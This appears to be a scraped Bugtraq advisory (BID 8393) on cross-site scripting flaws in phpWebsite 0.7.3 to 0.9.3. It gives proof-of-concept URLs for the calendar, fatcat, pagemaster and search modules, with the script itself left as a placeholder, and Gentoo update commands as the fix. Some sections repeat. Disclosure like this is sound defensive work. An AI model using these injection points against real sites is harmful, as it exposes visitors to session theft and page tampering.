PHP Website Multiple Module Cross-Site Scripting Vulnerability
BID:8393
Info
PHP Website Multiple Module Cross-Site Scripting Vulnerability
| Bugtraq ID: | 8393 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 11 2003 12:00AM |
| Updated: | Aug 11 2003 12:00AM |
| Credit: | The discovery of this issue has been credited to Lorenzo Hernandez Garcia-Hierro <[email protected]>. |
| Vulnerable: |
phpWebsite phpWebsite 0.9.3 phpWebsite phpWebsite 0.8.3 phpWebsite phpWebsite 0.8.2 phpWebsite phpWebsite 0.7.3 |
| Not Vulnerable: | |
Exploit / POC
PHP Website Multiple Module Cross-Site Scripting Vulnerability
The following proof of concept has been provided:
http://www.example.com/[PATH]/index.php?module=calendar&calendar[view]
=day&month=2&year=2003&day=1+%00">[XSS ATTACK CODE]
http://www.example.com/[PATH]/index.php?module=fatcat&fatcat[user]
=viewCategory&fatcat_id=1%00+">[XSS ATTACK CODE]
http://www.example.com/[PATH]/index.php?
module=pagemaster&PAGE_user_op=view_page&PAGE_id=10">[XSS ATTACK CODE]
&MMN_position=[X:X]
http://www.example.com/[PATH]/index.php?
module=search&SEA_search_op=continue&PDA_limit=10">[XSS ATTACK CODE]
The following proof of concept has been provided:
http://www.example.com/[PATH]/index.php?module=calendar&calendar[view]
=day&month=2&year=2003&day=1+%00">[XSS ATTACK CODE]
http://www.example.com/[PATH]/index.php?module=fatcat&fatcat[user]
=viewCategory&fatcat_id=1%00+">[XSS ATTACK CODE]
http://www.example.com/[PATH]/index.php?
module=pagemaster&PAGE_user_op=view_page&PAGE_id=10">[XSS ATTACK CODE]
&MMN_position=[X:X]
http://www.example.com/[PATH]/index.php?
module=search&SEA_search_op=continue&PDA_limit=10">[XSS ATTACK CODE]
Solution / Fix
PHP Website Multiple Module Cross-Site Scripting Vulnerability
Solution:
Gentoo Linux has released a security advisory (200309-03) to address this issue. Users who are affected by this issue are advised to do the following:
emerge sync
emerge phpwebsite
emerge clean
Solution:
Gentoo Linux has released a security advisory (200309-03) to address this issue. Users who are affected by this issue are advised to do the following:
emerge sync
emerge phpwebsite
emerge clean